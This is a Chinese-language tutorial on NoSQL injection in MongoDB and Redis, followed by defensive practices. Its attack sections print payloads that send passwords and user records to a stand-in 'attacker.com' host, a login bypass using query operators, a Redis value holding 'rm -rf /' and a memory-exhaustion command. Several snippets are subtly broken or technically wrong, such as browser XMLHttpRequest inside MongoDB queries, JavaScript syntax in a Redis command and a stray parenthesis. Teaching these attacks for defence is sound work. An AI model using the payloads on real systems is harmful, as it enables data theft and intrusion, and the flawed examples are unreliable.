NoSQL 注入：隐蔽而危险的数据库攻击

引言：当非关系型数据库遭遇安全危机

随着大数据时代的到来，MongoDB、Redis、Cassandra等NoSQL数据库凭借其灵活的数据模型和高可扩展性，迅速成为互联网应用的标配。然而，这种”无固定模式”的特性也带来了新的安全隐患——NoSQL注入攻击。与传统的SQL注入不同，NoSQL注入利用了非关系型数据库特有的查询语法和API特性，通过构造恶意输入来操纵数据库查询，最终实现数据泄露、篡改甚至系统控制。

NoSQL注入的原理与类型

1. 查询构造注入

NoSQL数据库通常使用JSON、BSON等格式进行查询，攻击者可通过修改查询参数实现注入。例如MongoDB的$where操作符允许执行JavaScript代码：

// 恶意请求示例
{
  "$where": "function() { 
    var req = new XMLHttpRequest(); 
    req.open('GET','http://attacker.com/steal?data='+this.password,false); 
    req.send(); 
    return true; 
  }"
}

这种攻击利用了MongoDB的JavaScript执行能力，可在查询过程中执行任意代码。

2. 操作符注入

MongoDB等文档数据库支持丰富的查询操作符（如$gt、$regex），攻击者可组合这些操作符绕过验证：

// 绕过密码验证的示例
{
  "username": "admin",
  "password": { "$gt": "" }  // 匹配所有非空密码
}

3. 重定向注入

某些NoSQL实现允许通过$eval或db.eval()执行服务器端代码，攻击者可利用此特性进行命令注入：

// Redis注入示例
SET user:1 "{\"role\":\"admin\", \"cmd\":\"rm -rf /\"}"

典型攻击场景分析

场景1：MongoDB未授权访问下的注入

当MongoDB未启用认证且暴露在公网时，攻击者可直接构造注入查询：

// 枚举所有数据库
db.adminCommand({listDatabases: 1})
// 导出敏感数据
db.users.find({}, {password: 1, _id: 0}).forEach(function(doc){
  new XMLHttpRequest().open("GET","http://attacker.com/collect?data="+encodeURIComponent(btoa(JSON.stringify(doc)))),false);
  new XMLHttpRequest().send();
});

场景2：Node.js应用中的MongoDB注入

使用Mongoose的常见危险模式：

// 危险代码示例
app.get('/user', async (req, res) => {
  const query = { username: req.query.username }; // 未做输入验证
  const user = await User.findOne(query);
  res.json(user);
});
// 攻击者请求
GET /user?username[$ne]=admin&password[$exists]=true

这将返回所有非admin用户且存在password字段的记录。

场景3：Redis注入导致服务崩溃

通过构造超长键值导致内存耗尽：

# 攻击命令示例
SET huge_key "A".repeat(1024*1024*100)  # 100MB数据

防御策略与最佳实践

1. 输入验证与净化

• 白名单验证：严格限制输入格式

  // 用户名验证示例
  function isValidUsername(username) {
  return /^[a-zA-Z0-9_]{4,20}$/.test(username);
  }

• 类型检查：确保数值、布尔值等类型正确

  // Node.js类型检查
  function toNumber(value) {
  const num = Number(value);
  return isNaN(num) ? null : num;
  }

2. 参数化查询实现

• MongoDB官方驱动方案：

  // 使用参数化查询
  const username = req.body.username;
  const password = req.body.password;
  User.findOne({ 
  username: username, 
  password: { $eq: password } 
  });

• Mongoose安全查询：

  // 使用lean()防止原型污染
  User.findOne({ _id: req.params.id })
  .lean()
  .exec((err, user) => { ... });

3. 最小权限原则

• 数据库用户权限配置：

  # MongoDB权限示例
  use admin
  db.createUser({
  user: "app_reader",
  pwd: "secure_password",
  roles: [ { role: "read", db: "app_db" } ]
  })

• Redis安全配置：

  # redis.conf配置示例
  requirepass your_secure_password
  rename-command FLUSHALL ""

4. 运行时防护

• Web应用防火墙(WAF)规则：

  # ModSecurity规则示例
  SecRule ARGS|ARGS_NAMES|XML:/* "\$where|\$eval|\$gt" \
  "id:'990015',phase:2,block,t:none,msg:'NoSQL Injection Attempt'"

• 查询日志监控：

  # MongoDB日志监控
  mongod --slowms 100 --slowOpThresholdMs 100 \
  --logpath /var/log/mongodb/mongod.log

5. 安全开发实践

• 依赖管理：

  # 定期更新依赖
  npm outdated
  npm update mongoose @types/mongoose

• 代码审查清单：

  • 所有数据库查询都使用参数绑定
  • 禁用危险的JavaScript执行功能
  • 实施严格的输入验证
  • 数据库连接使用最小权限

高级防御技术

1. 查询重写与规范化

实现中间件自动重写危险查询：

// Express中间件示例
app.use((req, res, next) => {
  if (req.query) {
    Object.keys(req.query).forEach(key => {
      if (key.startsWith('$') || key.includes('.')) {
        return res.status(400).json({ error: 'Invalid query parameter' });
      }
    });
  }
  next();
});

2. 行为分析与异常检测

部署机器学习模型检测异常查询模式：

# 伪代码示例
def detect_anomaly(query):
    features = extract_features(query)
    score = model.predict_proba([features])[0][1]
    return score > THRESHOLD

3. 加密与令牌化

对敏感字段实施加密存储：

// Node.js加密示例
const crypto = require('crypto');
const algorithm = 'aes-256-cbc';
const key = crypto.randomBytes(32);
const iv = crypto.randomBytes(16);
function encrypt(text) {
  let cipher = crypto.createCipheriv(algorithm, Buffer.from(key), iv);
  let encrypted = cipher.update(text);
  encrypted = Buffer.concat([encrypted, cipher.final()]);
  return { iv: iv.toString('hex'), encryptedData: encrypted.toString('hex') };
}

结论：构建安全的NoSQL应用

NoSQL注入攻击的防范需要多层次的防御策略，从输入验证到数据库配置，从代码实现到运行时监控。开发者应当：

1. 始终假设所有用户输入都是恶意的
2. 遵循最小权限原则配置数据库
3. 定期更新数据库驱动和框架
4. 实施深度防御的安全架构

随着NoSQL技术的普及，安全防护必须成为应用开发的标配而非选配。通过系统化的安全实践，我们能够有效抵御NoSQL注入威胁，保护企业数据资产和用户隐私。